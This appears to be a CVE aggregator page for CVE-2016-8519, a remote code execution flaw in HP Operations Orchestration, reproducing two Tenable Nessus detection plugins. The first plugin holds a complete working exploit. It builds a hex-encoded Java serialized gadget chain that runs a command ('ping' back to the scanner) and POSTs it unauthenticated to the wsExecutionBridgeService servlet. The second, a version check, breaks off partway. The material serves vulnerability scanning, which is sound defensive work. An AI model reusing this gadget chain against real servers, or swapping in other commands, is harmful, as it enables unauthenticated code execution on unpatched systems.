CVE-2016-8519 - Deserialization of Untrusted Data vulnerability in HP Operations Orchestration
Attack vector: NETWORK
Attack complexity: LOW
Privileges required: NONE
Confidentiality impact: HIGH
Integrity impact: HIGH
Availability impact: HIGH
Summary
A remote code execution vulnerability was found in HPE Operations Orchestration Community and Enterprise editions prior to v10.70.
Vulnerable Configurations
Part | Description | Count |
---|---|---|
Application | | 2 |
Common Weakness Enumeration (CWE)
Nessus
NASL family CGI abuses NASL id HP_OPERATIONS_ORCHESTRATION_BRIDGE_EXEC.NASL description The version of HP Operations Orchestration running on the remote host is affected by a remote code execution vulnerability in the wsExecutionBridgeService servlet due to improper validation of user-supplied input before deserialization. An unauthenticated, remote attacker can exploit this, by sending a crafted serialized Java object, to execute arbitrary code. last seen 2020-06-01 modified 2020-06-02 plugin id 96532 published 2017-01-16 reporter This script is Copyright (C) 2017-2019 and is owned by Tenable, Inc. or an Affiliate thereof. source https://www.tenable.com/plugins/nessus/96532 title HP Operations Orchestration wsExecutionBridgeService Servlet Java Object Deserialization RCE code # # (C) Tenable Network Security, Inc. # include("compat.inc"); if (description) { script_id(96532); script_version("1.9"); script_cvs_date("Date: 2019/11/13"); script_cve_id("CVE-2016-8519"); script_bugtraq_id(95225); script_xref(name:"HP", value:"HPSBGN03688"); script_xref(name:"HP", value:"emr_na-c05361944"); script_xref(name:"ZDI", value:"ZDI-17-001"); script_name(english:"HP Operations Orchestration wsExecutionBridgeService Servlet Java Object Deserialization RCE"); script_summary(english:"Tries to execute a command via deserialization."); script_set_attribute(attribute:"synopsis", value: "The remote host is affected by a remote code execution vulnerability."); script_set_attribute(attribute:"description", value: "The version of HP Operations Orchestration running on the remote host is affected by a remote code execution vulnerability in the wsExecutionBridgeService servlet due to improper validation of user-supplied input before deserialization. 
An unauthenticated, remote attacker can exploit this, by sending a crafted serialized Java object, to execute arbitrary code."); # https://support.hpe.com/hpsc/doc/public/display?docId=emr_na-c05361944 script_set_attribute(attribute:"see_also", value:"http://www.nessus.org/u?6db3b8a9"); script_set_attribute(attribute:"see_also", value:"https://www.zerodayinitiative.com/advisories/ZDI-17-001/"); script_set_attribute(attribute:"solution", value: "Upgrade to HP Operations Orchestration version 10.70 or later."); script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C"); script_set_cvss_temporal_vector("CVSS2#E:POC/RL:OF/RC:C"); script_set_cvss3_base_vector("CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"); script_set_cvss3_temporal_vector("CVSS:3.0/E:P/RL:O/RC:C"); script_set_attribute(attribute:"cvss_score_source", value:"CVE-2016-8519"); script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available"); script_set_attribute(attribute:"exploit_available", value:"true"); script_set_attribute(attribute:"exploited_by_nessus", value:"true"); script_set_attribute(attribute:"vuln_publication_date", value:"2017/01/03"); script_set_attribute(attribute:"patch_publication_date", value:"2017/01/03"); script_set_attribute(attribute:"plugin_publication_date", value:"2017/01/16"); script_set_attribute(attribute:"plugin_type", value:"remote"); script_set_attribute(attribute:"cpe", value:"cpe:/a:hp:operations_orchestration"); script_end_attributes(); script_category(ACT_ATTACK); script_family(english:"CGI abuses"); script_copyright(english:"This script is Copyright (C) 2017-2019 and is owned by Tenable, Inc. 
or an Affiliate thereof."); script_dependencies("hp_operations_orchestration_detect.nbin"); script_require_keys("installed_sw/HP Operations Orchestration"); script_require_ports("Services/www", 8080, 8443); exit(0); } include("audit.inc"); include("global_settings.inc"); include("misc_func.inc"); include("http.inc"); include("install_func.inc"); appname = "HP Operations Orchestration"; get_install_count(app_name:appname, exit_if_zero:TRUE); port = get_http_port(default:8080); install = get_single_install(app_name:appname, port:port, exit_if_unknown_ver:TRUE); soc = open_sock_tcp(port); if (!soc) audit(AUDIT_SOCK_FAIL, port, appname); # serialized beansutils to execute ping -n 10 xxx beansutils = '\xac\xed\x00\x05\x73\x72\x00\x49\x6f\x72\x67\x2e\x73\x70\x72\x69\x6e\x67\x66\x72\x61\x6d\x65\x77\x6f\x72\x6b\x2e\x63\x6f\x72\x65\x2e\x53\x65\x72\x69\x61\x6c\x69\x7a\x61\x62\x6c\x65\x54\x79\x70\x65\x57\x72\x61\x70\x70\x65\x72\x24\x4d\x65\x74\x68\x6f\x64\x49\x6e\x76\x6f\x6b\x65\x54\x79\x70\x65\x50\x72\x6f\x76\x69\x64\x65\x72\xb2\x4a\xb4\x07\x8b\x41\x1a\xd7\x02\x00\x03\x49\x00\x05\x69\x6e\x64\x65\x78\x4c\x00\x0a\x6d\x65\x74\x68\x6f\x64\x4e\x61\x6d\x65\x74\x00\x12\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x53\x74\x72\x69\x6e\x67\x3b\x4c\x00\x08\x70\x72\x6f\x76\x69\x64\x65\x72\x74\x00\x3f\x4c\x6f\x72\x67\x2f\x73\x70\x72\x69\x6e\x67\x66\x72\x61\x6d\x65\x77\x6f\x72\x6b\x2f\x63\x6f\x72\x65\x2f\x53\x65\x72\x69\x61\x6c\x69\x7a\x61\x62\x6c\x65\x54\x79\x70\x65\x57\x72\x61\x70\x70\x65\x72\x24\x54\x79\x70\x65\x50\x72\x6f\x76\x69\x64\x65\x72\x3b\x78\x70\x00\x00\x00\x00\x74\x00\x0e\x6e\x65\x77\x54\x72\x61\x6e\x73\x66\x6f\x72\x6d\x65\x72\x73\x7d\x00\x00\x00\x01\x00\x3d\x6f\x72\x67\x2e\x73\x70\x72\x69\x6e\x67\x66\x72\x61\x6d\x65\x77\x6f\x72\x6b\x2e\x63\x6f\x72\x65\x2e\x53\x65\x72\x69\x61\x6c\x69\x7a\x61\x62\x6c\x65\x54\x79\x70\x65\x57\x72\x61\x70\x70\x65\x72\x24\x54\x79\x70\x65\x50\x72\x6f\x76\x69\x64\x65\x72\x78\x72\x00\x17\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x72\x65\x66\x6c\x65\x63\x
74\x2e\x50\x72\x6f\x78\x79\xe1\x27\xda\x20\xcc\x10\x43\xcb\x02\x00\x01\x4c\x00\x01\x68\x74\x00\x25\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x72\x65\x66\x6c\x65\x63\x74\x2f\x49\x6e\x76\x6f\x63\x61\x74\x69\x6f\x6e\x48\x61\x6e\x64\x6c\x65\x72\x3b\x78\x70\x73\x72\x00\x32\x73\x75\x6e\x2e\x72\x65\x66\x6c\x65\x63\x74\x2e\x61\x6e\x6e\x6f\x74\x61\x74\x69\x6f\x6e\x2e\x41\x6e\x6e\x6f\x74\x61\x74\x69\x6f\x6e\x49\x6e\x76\x6f\x63\x61\x74\x69\x6f\x6e\x48\x61\x6e\x64\x6c\x65\x72\x55\xca\xf5\x0f\x15\xcb\x7e\xa5\x02\x00\x02\x4c\x00\x0c\x6d\x65\x6d\x62\x65\x72\x56\x61\x6c\x75\x65\x73\x74\x00\x0f\x4c\x6a\x61\x76\x61\x2f\x75\x74\x69\x6c\x2f\x4d\x61\x70\x3b\x4c\x00\x04\x74\x79\x70\x65\x74\x00\x11\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x43\x6c\x61\x73\x73\x3b\x78\x70\x73\x72\x00\x11\x6a\x61\x76\x61\x2e\x75\x74\x69\x6c\x2e\x48\x61\x73\x68\x4d\x61\x70\x05\x07\xda\xc1\xc3\x16\x60\xd1\x03\x00\x02\x46\x00\x0a\x6c\x6f\x61\x64\x46\x61\x63\x74\x6f\x72\x49\x00\x09\x74\x68\x72\x65\x73\x68\x6f\x6c\x64\x78\x70\x3f\x40\x00\x00\x00\x00\x00\x0c\x77\x08\x00\x00\x00\x10\x00\x00\x00\x01\x74\x00\x07\x67\x65\x74\x54\x79\x70\x65\x73\x7d\x00\x00\x00\x02\x00\x16\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x72\x65\x66\x6c\x65\x63\x74\x2e\x54\x79\x70\x65\x00\x1d\x6a\x61\x76\x61\x78\x2e\x78\x6d\x6c\x2e\x74\x72\x61\x6e\x73\x66\x6f\x72\x6d\x2e\x54\x65\x6d\x70\x6c\x61\x74\x65\x73\x78\x71\x00\x7e\x00\x06\x73\x72\x00\x60\x6f\x72\x67\x2e\x73\x70\x72\x69\x6e\x67\x66\x72\x61\x6d\x65\x77\x6f\x72\x6b\x2e\x62\x65\x61\x6e\x73\x2e\x66\x61\x63\x74\x6f\x72\x79\x2e\x73\x75\x70\x70\x6f\x72\x74\x2e\x41\x75\x74\x6f\x77\x69\x72\x65\x55\x74\x69\x6c\x73\x24\x4f\x62\x6a\x65\x63\x74\x46\x61\x63\x74\x6f\x72\x79\x44\x65\x6c\x65\x67\x61\x74\x69\x6e\x67\x49\x6e\x76\x6f\x63\x61\x74\x69\x6f\x6e\x48\x61\x6e\x64\x6c\x65\x72\x85\x62\xcb\xc0\x0c\xfd\x31\x13\x02\x00\x01\x4c\x00\x0d\x6f\x62\x6a\x65\x63\x74\x46\x61\x63\x74\x6f\x72\x79\x74\x00\x31\x4c\x6f\x72\x67\x2f\x73\x70\x72\x69\x6e\x67\x66\x72\x61\x6d\x65\x77\x6f\x72\x6b\x2f\x62\x65\x61\x6e\x
73\x2f\x66\x61\x63\x74\x6f\x72\x79\x2f\x4f\x62\x6a\x65\x63\x74\x46\x61\x63\x74\x6f\x72\x79\x3b\x78\x70\x73\x7d\x00\x00\x00\x01\x00\x2f\x6f\x72\x67\x2e\x73\x70\x72\x69\x6e\x67\x66\x72\x61\x6d\x65\x77\x6f\x72\x6b\x2e\x62\x65\x61\x6e\x73\x2e\x66\x61\x63\x74\x6f\x72\x79\x2e\x4f\x62\x6a\x65\x63\x74\x46\x61\x63\x74\x6f\x72\x79\x78\x71\x00\x7e\x00\x06\x73\x71\x00\x7e\x00\x09\x73\x71\x00\x7e\x00\x0d\x3f\x40\x00\x00\x00\x00\x00\x0c\x77\x08\x00\x00\x00\x10\x00\x00\x00\x01\x74\x00\x09\x67\x65\x74\x4f\x62\x6a\x65\x63\x74\x73\x72\x00\x3a\x63\x6f\x6d\x2e\x73\x75\x6e\x2e\x6f\x72\x67\x2e\x61\x70\x61\x63\x68\x65\x2e\x78\x61\x6c\x61\x6e\x2e\x69\x6e\x74\x65\x72\x6e\x61\x6c\x2e\x78\x73\x6c\x74\x63\x2e\x74\x72\x61\x78\x2e\x54\x65\x6d\x70\x6c\x61\x74\x65\x73\x49\x6d\x70\x6c\x09\x57\x4f\xc1\x6e\xac\xab\x33\x03\x00\x06\x49\x00\x0d\x5f\x69\x6e\x64\x65\x6e\x74\x4e\x75\x6d\x62\x65\x72\x49\x00\x0e\x5f\x74\x72\x61\x6e\x73\x6c\x65\x74\x49\x6e\x64\x65\x78\x5b\x00\x0a\x5f\x62\x79\x74\x65\x63\x6f\x64\x65\x73\x74\x00\x03\x5b\x5b\x42\x5b\x00\x06\x5f\x63\x6c\x61\x73\x73\x74\x00\x12\x5b\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x43\x6c\x61\x73\x73\x3b\x4c\x00\x05\x5f\x6e\x61\x6d\x65\x71\x00\x7e\x00\x01\x4c\x00\x11\x5f\x6f\x75\x74\x70\x75\x74\x50\x72\x6f\x70\x65\x72\x74\x69\x65\x73\x74\x00\x16\x4c\x6a\x61\x76\x61\x2f\x75\x74\x69\x6c\x2f\x50\x72\x6f\x70\x65\x72\x74\x69\x65\x73\x3b\x78\x70\x00\x00\x00\x00\xff\xff\xff\xff\x75\x72\x00\x03\x5b\x5b\x42\x4b\xfd\x19\x15\x67\x67\xdb\x37\x02\x00\x00\x78\x70\x00\x00\x00\x02\x75\x72\x00\x02\x5b\x42\xac\xf3\x17\xf8\x06\x08\x54\xe0\x02\x00\x00\x78\x70'; body = 
'\xca\xfe\xba\xbe\x00\x00\x00\x31\x00\x3c\x0a\x00\x03\x00\x22\x07\x00\x3a\x07\x00\x25\x07\x00\x26\x01\x00\x10\x73\x65\x72\x69\x61\x6c\x56\x65\x72\x73\x69\x6f\x6e\x55\x49\x44\x01\x00\x01\x4a\x01\x00\x0d\x43\x6f\x6e\x73\x74\x61\x6e\x74\x56\x61\x6c\x75\x65\x05\xad\x20\x93\xf3\x91\xdd\xef\x3e\x01\x00\x06\x3c\x69\x6e\x69\x74\x3e\x01\x00\x03\x28\x29\x56\x01\x00\x04\x43\x6f\x64\x65\x01\x00\x0f\x4c\x69\x6e\x65\x4e\x75\x6d\x62\x65\x72\x54\x61\x62\x6c\x65\x01\x00\x12\x4c\x6f\x63\x61\x6c\x56\x61\x72\x69\x61\x62\x6c\x65\x54\x61\x62\x6c\x65\x01\x00\x04\x74\x68\x69\x73\x01\x00\x13\x53\x74\x75\x62\x54\x72\x61\x6e\x73\x6c\x65\x74\x50\x61\x79\x6c\x6f\x61\x64\x01\x00\x0c\x49\x6e\x6e\x65\x72\x43\x6c\x61\x73\x73\x65\x73\x01\x00\x35\x4c\x79\x73\x6f\x73\x65\x72\x69\x61\x6c\x2f\x70\x61\x79\x6c\x6f\x61\x64\x73\x2f\x75\x74\x69\x6c\x2f\x47\x61\x64\x67\x65\x74\x73\x24\x53\x74\x75\x62\x54\x72\x61\x6e\x73\x6c\x65\x74\x50\x61\x79\x6c\x6f\x61\x64\x3b\x01\x00\x09\x74\x72\x61\x6e\x73\x66\x6f\x72\x6d\x01\x00\x72\x28\x4c\x63\x6f\x6d\x2f\x73\x75\x6e\x2f\x6f\x72\x67\x2f\x61\x70\x61\x63\x68\x65\x2f\x78\x61\x6c\x61\x6e\x2f\x69\x6e\x74\x65\x72\x6e\x61\x6c\x2f\x78\x73\x6c\x74\x63\x2f\x44\x4f\x4d\x3b\x5b\x4c\x63\x6f\x6d\x2f\x73\x75\x6e\x2f\x6f\x72\x67\x2f\x61\x70\x61\x63\x68\x65\x2f\x78\x6d\x6c\x2f\x69\x6e\x74\x65\x72\x6e\x61\x6c\x2f\x73\x65\x72\x69\x61\x6c\x69\x7a\x65\x72\x2f\x53\x65\x72\x69\x61\x6c\x69\x7a\x61\x74\x69\x6f\x6e\x48\x61\x6e\x64\x6c\x65\x72\x3b\x29\x56\x01\x00\x08\x64\x6f\x63\x75\x6d\x65\x6e\x74\x01\x00\x2d\x4c\x63\x6f\x6d\x2f\x73\x75\x6e\x2f\x6f\x72\x67\x2f\x61\x70\x61\x63\x68\x65\x2f\x78\x61\x6c\x61\x6e\x2f\x69\x6e\x74\x65\x72\x6e\x61\x6c\x2f\x78\x73\x6c\x74\x63\x2f\x44\x4f\x4d\x3b\x01\x00\x08\x68\x61\x6e\x64\x6c\x65\x72\x73\x01\x00\x42\x5b\x4c\x63\x6f\x6d\x2f\x73\x75\x6e\x2f\x6f\x72\x67\x2f\x61\x70\x61\x63\x68\x65\x2f\x78\x6d\x6c\x2f\x69\x6e\x74\x65\x72\x6e\x61\x6c\x2f\x73\x65\x72\x69\x61\x6c\x69\x7a\x65\x72\x2f\x53\x65\x72\x69\x61\x6c\x69\x7a\x61\x74\x69\x6f\x6e\x48\x61\x6e\x64\x6c\x65\x7
2\x3b\x01\x00\x0a\x45\x78\x63\x65\x70\x74\x69\x6f\x6e\x73\x07\x00\x27\x01\x00\xa6\x28\x4c\x63\x6f\x6d\x2f\x73\x75\x6e\x2f\x6f\x72\x67\x2f\x61\x70\x61\x63\x68\x65\x2f\x78\x61\x6c\x61\x6e\x2f\x69\x6e\x74\x65\x72\x6e\x61\x6c\x2f\x78\x73\x6c\x74\x63\x2f\x44\x4f\x4d\x3b\x4c\x63\x6f\x6d\x2f\x73\x75\x6e\x2f\x6f\x72\x67\x2f\x61\x70\x61\x63\x68\x65\x2f\x78\x6d\x6c\x2f\x69\x6e\x74\x65\x72\x6e\x61\x6c\x2f\x64\x74\x6d\x2f\x44\x54\x4d\x41\x78\x69\x73\x49\x74\x65\x72\x61\x74\x6f\x72\x3b\x4c\x63\x6f\x6d\x2f\x73\x75\x6e\x2f\x6f\x72\x67\x2f\x61\x70\x61\x63\x68\x65\x2f\x78\x6d\x6c\x2f\x69\x6e\x74\x65\x72\x6e\x61\x6c\x2f\x73\x65\x72\x69\x61\x6c\x69\x7a\x65\x72\x2f\x53\x65\x72\x69\x61\x6c\x69\x7a\x61\x74\x69\x6f\x6e\x48\x61\x6e\x64\x6c\x65\x72\x3b\x29\x56\x01\x00\x08\x69\x74\x65\x72\x61\x74\x6f\x72\x01\x00\x35\x4c\x63\x6f\x6d\x2f\x73\x75\x6e\x2f\x6f\x72\x67\x2f\x61\x70\x61\x63\x68\x65\x2f\x78\x6d\x6c\x2f\x69\x6e\x74\x65\x72\x6e\x61\x6c\x2f\x64\x74\x6d\x2f\x44\x54\x4d\x41\x78\x69\x73\x49\x74\x65\x72\x61\x74\x6f\x72\x3b\x01\x00\x07\x68\x61\x6e\x64\x6c\x65\x72\x01\x00\x41\x4c\x63\x6f\x6d\x2f\x73\x75\x6e\x2f\x6f\x72\x67\x2f\x61\x70\x61\x63\x68\x65\x2f\x78\x6d\x6c\x2f\x69\x6e\x74\x65\x72\x6e\x61\x6c\x2f\x73\x65\x72\x69\x61\x6c\x69\x7a\x65\x72\x2f\x53\x65\x72\x69\x61\x6c\x69\x7a\x61\x74\x69\x6f\x6e\x48\x61\x6e\x64\x6c\x65\x72\x3b\x01\x00\x0a\x53\x6f\x75\x72\x63\x65\x46\x69\x6c\x65\x01\x00\x0c\x47\x61\x64\x67\x65\x74\x73\x2e\x6a\x61\x76\x61\x0c\x00\x0a\x00\x0b\x07\x00\x28\x01\x00\x33\x79\x73\x6f\x73\x65\x72\x69\x61\x6c\x2f\x70\x61\x79\x6c\x6f\x61\x64\x73\x2f\x75\x74\x69\x6c\x2f\x47\x61\x64\x67\x65\x74\x73\x24\x53\x74\x75\x62\x54\x72\x61\x6e\x73\x6c\x65\x74\x50\x61\x79\x6c\x6f\x61\x64\x01\x00\x40\x63\x6f\x6d\x2f\x73\x75\x6e\x2f\x6f\x72\x67\x2f\x61\x70\x61\x63\x68\x65\x2f\x78\x61\x6c\x61\x6e\x2f\x69\x6e\x74\x65\x72\x6e\x61\x6c\x2f\x78\x73\x6c\x74\x63\x2f\x72\x75\x6e\x74\x69\x6d\x65\x2f\x41\x62\x73\x74\x72\x61\x63\x74\x54\x72\x61\x6e\x73\x6c\x65\x74\x01\x00\x14\x6a\x61\x76\x61\x2f\x69\x6f\x2f\x5
3\x65\x72\x69\x61\x6c\x69\x7a\x61\x62\x6c\x65\x01\x00\x39\x63\x6f\x6d\x2f\x73\x75\x6e\x2f\x6f\x72\x67\x2f\x61\x70\x61\x63\x68\x65\x2f\x78\x61\x6c\x61\x6e\x2f\x69\x6e\x74\x65\x72\x6e\x61\x6c\x2f\x78\x73\x6c\x74\x63\x2f\x54\x72\x61\x6e\x73\x6c\x65\x74\x45\x78\x63\x65\x70\x74\x69\x6f\x6e\x01\x00\x1f\x79\x73\x6f\x73\x65\x72\x69\x61\x6c\x2f\x70\x61\x79\x6c\x6f\x61\x64\x73\x2f\x75\x74\x69\x6c\x2f\x47\x61\x64\x67\x65\x74\x73\x01\x00\x08\x3c\x63\x6c\x69\x6e\x69\x74\x3e\x01\x00\x11\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x52\x75\x6e\x74\x69\x6d\x65\x07\x00\x2a\x01\x00\x0a\x67\x65\x74\x52\x75\x6e\x74\x69\x6d\x65\x01\x00\x15\x28\x29\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x52\x75\x6e\x74\x69\x6d\x65\x3b\x0c\x00\x2c\x00\x2d\x0a\x00\x2b\x00\x2e\x01\x00\x10\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x53\x74\x72\x69\x6e\x67\x07\x00\x30\x01\x00\x03\x63\x6d\x64\x08\x00\x32\x01'; trailer = '\x75\x71\x00\x7e\x00\x21\x00\x00\x01\xd4\xca\xfe\xba\xbe\x00\x00\x00\x31\x00\x1b\x0a\x00\x03\x00\x15\x07\x00\x17\x07\x00\x18\x07\x00\x19\x01\x00\x10\x73\x65\x72\x69\x61\x6c\x56\x65\x72\x73\x69\x6f\x6e\x55\x49\x44\x01\x00\x01\x4a\x01\x00\x0d\x43\x6f\x6e\x73\x74\x61\x6e\x74\x56\x61\x6c\x75\x65\x05\x71\xe6\x69\xee\x3c\x6d\x47\x18\x01\x00\x06\x3c\x69\x6e\x69\x74\x3e\x01\x00\x03\x28\x29\x56\x01\x00\x04\x43\x6f\x64\x65\x01\x00\x0f\x4c\x69\x6e\x65\x4e\x75\x6d\x62\x65\x72\x54\x61\x62\x6c\x65\x01\x00\x12\x4c\x6f\x63\x61\x6c\x56\x61\x72\x69\x61\x62\x6c\x65\x54\x61\x62\x6c\x65\x01\x00\x04\x74\x68\x69\x73\x01\x00\x03\x46\x6f\x6f\x01\x00\x0c\x49\x6e\x6e\x65\x72\x43\x6c\x61\x73\x73\x65\x73\x01\x00\x25\x4c\x79\x73\x6f\x73\x65\x72\x69\x61\x6c\x2f\x70\x61\x79\x6c\x6f\x61\x64\x73\x2f\x75\x74\x69\x6c\x2f\x47\x61\x64\x67\x65\x74\x73\x24\x46\x6f\x6f\x3b\x01\x00\x0a\x53\x6f\x75\x72\x63\x65\x46\x69\x6c\x65\x01\x00\x0c\x47\x61\x64\x67\x65\x74\x73\x2e\x6a\x61\x76\x61\x0c\x00\x0a\x00\x0b\x07\x00\x1a\x01\x00\x23\x79\x73\x6f\x73\x65\x72\x69\x61\x6c\x2f\x70\x61\x79\x6c\x6f\x61\x64\x73\x2f\x75\x74\x69\x6c\x2f\x47\x61\x64\x67\
x65\x74\x73\x24\x46\x6f\x6f\x01\x00\x10\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x4f\x62\x6a\x65\x63\x74\x01\x00\x14\x6a\x61\x76\x61\x2f\x69\x6f\x2f\x53\x65\x72\x69\x61\x6c\x69\x7a\x61\x62\x6c\x65\x01\x00\x1f\x79\x73\x6f\x73\x65\x72\x69\x61\x6c\x2f\x70\x61\x79\x6c\x6f\x61\x64\x73\x2f\x75\x74\x69\x6c\x2f\x47\x61\x64\x67\x65\x74\x73\x00\x21\x00\x02\x00\x03\x00\x01\x00\x04\x00\x01\x00\x1a\x00\x05\x00\x06\x00\x01\x00\x07\x00\x00\x00\x02\x00\x08\x00\x01\x00\x01\x00\x0a\x00\x0b\x00\x01\x00\x0c\x00\x00\x00\x2f\x00\x01\x00\x01\x00\x00\x00\x05\x2a\xb7\x00\x01\xb1\x00\x00\x00\x02\x00\x0d\x00\x00\x00\x06\x00\x01\x00\x00\x00\x3b\x00\x0e\x00\x00\x00\x0c\x00\x01\x00\x00\x00\x05\x00\x0f\x00\x12\x00\x00\x00\x02\x00\x13\x00\x00\x00\x02\x00\x14\x00\x11\x00\x00\x00\x0a\x00\x01\x00\x02\x00\x16\x00\x10\x00\x09\x70\x74\x00\x04\x50\x77\x6e\x72\x70\x77\x01\x00\x78\x78\x76\x72\x00\x12\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x4f\x76\x65\x72\x72\x69\x64\x65\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x78\x70\x78\x71\x00\x7e\x00\x26'; cmd_ping = '/c ping -n 10 ' + compat::this_host(); cmd_ping = mkword(len(cmd_ping)) + cmd_ping; cmd_ping += 
'\x08\x00\x34\x01\x00\x04\x65\x78\x65\x63\x01\x00\x28\x28\x5b\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x53\x74\x72\x69\x6e\x67\x3b\x29\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x50\x72\x6f\x63\x65\x73\x73\x3b\x0c\x00\x36\x00\x37\x0a\x00\x2b\x00\x38\x01\x00\x1c\x79\x73\x6f\x73\x65\x72\x69\x61\x6c\x2f\x50\x77\x6e\x65\x72\x32\x37\x34\x35\x33\x36\x30\x34\x30\x33\x34\x31\x39\x01\x00\x1e\x4c\x79\x73\x6f\x73\x65\x72\x69\x61\x6c\x2f\x50\x77\x6e\x65\x72\x32\x37\x34\x35\x33\x36\x30\x34\x30\x33\x34\x31\x39\x3b\x00\x21\x00\x02\x00\x03\x00\x01\x00\x04\x00\x01\x00\x1a\x00\x05\x00\x06\x00\x01\x00\x07\x00\x00\x00\x02\x00\x08\x00\x04\x00\x01\x00\x0a\x00\x0b\x00\x01\x00\x0c\x00\x00\x00\x2f\x00\x01\x00\x01\x00\x00\x00\x05\x2a\xb7\x00\x01\xb1\x00\x00\x00\x02\x00\x0d\x00\x00\x00\x06\x00\x01\x00\x00\x00\x2e\x00\x0e\x00\x00\x00\x0c\x00\x01\x00\x00\x00\x05\x00\x0f\x00\x3b\x00\x00\x00\x01\x00\x13\x00\x14\x00\x02\x00\x0c\x00\x00\x00\x3f\x00\x00\x00\x03\x00\x00\x00\x01\xb1\x00\x00\x00\x02\x00\x0d\x00\x00\x00\x06\x00\x01\x00\x00\x00\x33\x00\x0e\x00\x00\x00\x20\x00\x03\x00\x00\x00\x01\x00\x0f\x00\x3b\x00\x00\x00\x00\x00\x01\x00\x15\x00\x16\x00\x01\x00\x00\x00\x01\x00\x17\x00\x18\x00\x02\x00\x19\x00\x00\x00\x04\x00\x01\x00\x1a\x00\x01\x00\x13\x00\x1b\x00\x02\x00\x0c\x00\x00\x00\x49\x00\x00\x00\x04\x00\x00\x00\x01\xb1\x00\x00\x00\x02\x00\x0d\x00\x00\x00\x06\x00\x01\x00\x00\x00\x37\x00\x0e\x00\x00\x00\x2a\x00\x04\x00\x00\x00\x01\x00\x0f\x00\x3b\x00\x00\x00\x00\x00\x01\x00\x15\x00\x16\x00\x01\x00\x00\x00\x01\x00\x1c\x00\x1d\x00\x02\x00\x00\x00\x01\x00\x1e\x00\x1f\x00\x03\x00\x19\x00\x00\x00\x04\x00\x01\x00\x1a\x00\x08\x00\x29\x00\x0b\x00\x01\x00\x0c\x00\x00\x00\x27\x00\x06\x00\x02\x00\x00\x00\x1b\xa7\x00\x03\x01\x4c\xb8\x00\x2f\x05\xbd\x00\x31\x59\x03\x12\x33\x53\x59\x04\x12\x35\x53\xb6\x00\x39\x57\xb1\x00\x00\x00\x00\x00\x02\x00\x20\x00\x00\x00\x02\x00\x21\x00\x11\x00\x00\x00\x0a\x00\x01\x00\x02\x00\x23\x00\x10\x00\x09'; body += cmd_ping; beansutils += mkdword(len(body)) + body; beansutils 
+= trailer; http_request = 'POST /oo/backwards-compatibility/wsExecutionBridgeService HTTP/1.0\r\n' + 'Host: ' + get_host_ip() + ':' + port + '\r\n' + 'Content-Type: application/x-java-serialized-object; charset=utf-8\r\n' + 'Content-Length: ' + len(beansutils) + '\r\n' + '\r\n' + beansutils; filter = "icmp and icmp[0] = 8 and src host " + get_host_ip(); response = send_capture(socket:soc, data:http_request, pcap_filter:filter); icmp = tolower(hexstr(get_icmp_element(icmp:response, element:"data"))); close(soc); # No response, meaning we didn't get in if(isnull(icmp)) audit(AUDIT_INST_VER_NOT_VULN, appname, install["version"]); report = '\nNessus was able to exploit a Java deserialization vulnerability by' + '\nsending a crafted Java object.' + '\n'; security_report_v4(port:port, severity:SECURITY_HOLE, extra:report);
NASL family CGI abuses NASL id HP_OPERATIONS_ORCHESTRATION_HPSBGN03688.NASL description The version of HP Operations Orchestration running on the remote host is 10.x prior to 10.70. It is, therefore, affected by a remote code execution vulnerability in the wsExecutionBridgeService servlet due to improper validation of user-supplied input before deserialization. An unauthenticated, remote attacker can exploit this, by sending a crafted serialized Java object, to execute arbitrary code. Note that this vulnerability only affects the Community and Enterprise editions. last seen 2020-06-01 modified 2020-06-02 plugin id 96449 published 2017-01-12 reporter This script is Copyright (C) 2017-2019 and is owned by Tenable, Inc. or an Affiliate thereof. source https://www.tenable.com/plugins/nessus/96449 title HP Operations Orchestration 10.x < 10.70 wsExecutionBridgeService Servlet Java Object Deserialization RCE code
#
# (C) Tenable Network Security, Inc.
#

# Version-based check for CVE-2016-8519 (ACT_GATHER_INFO): flags an HP
# Operations Orchestration install whose recorded version is below 10.70
# and whose recorded edition is Community or Enterprise. It sends nothing
# to the target itself; every input comes from the installed_sw KB entries
# written by hp_operations_orchestration_detect.nbin.

include("compat.inc");

if (description)
{
  script_id(96449);
  script_version("1.9");
  script_cvs_date("Date: 2019/11/13");

  script_cve_id("CVE-2016-8519");
  script_bugtraq_id(95225);
  script_xref(name:"HP", value:"HPSBGN03688");
  script_xref(name:"HP", value:"emr_na-c05361944");
  script_xref(name:"ZDI", value:"ZDI-17-001");

  script_name(english:"HP Operations Orchestration 10.x < 10.70 wsExecutionBridgeService Servlet Java Object Deserialization RCE");
  script_summary(english:"Checks the HP Operations Orchestration version.");

  script_set_attribute(attribute:"synopsis", value:
"The remote host is affected by a remote code execution vulnerability.");
  script_set_attribute(attribute:"description", value:
"The version of HP Operations Orchestration running on the remote host is 10.x prior to 10.70. It is, therefore, affected by a remote code execution vulnerability in the wsExecutionBridgeService servlet due to improper validation of user-supplied input before deserialization. 
An unauthenticated, remote attacker can exploit this, by sending a crafted serialized Java object, to execute arbitrary code. Note that this vulnerability only affects the Community and Enterprise editions.");
  # https://support.hpe.com/hpsc/doc/public/display?docId=emr_na-c05361944
  script_set_attribute(attribute:"see_also", value:"http://www.nessus.org/u?6db3b8a9");
  script_set_attribute(attribute:"see_also", value:"https://www.zerodayinitiative.com/advisories/ZDI-17-001/");
  script_set_attribute(attribute:"solution", value:
"Upgrade to HP Operations Orchestration version 10.70 or later.");
  script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C");
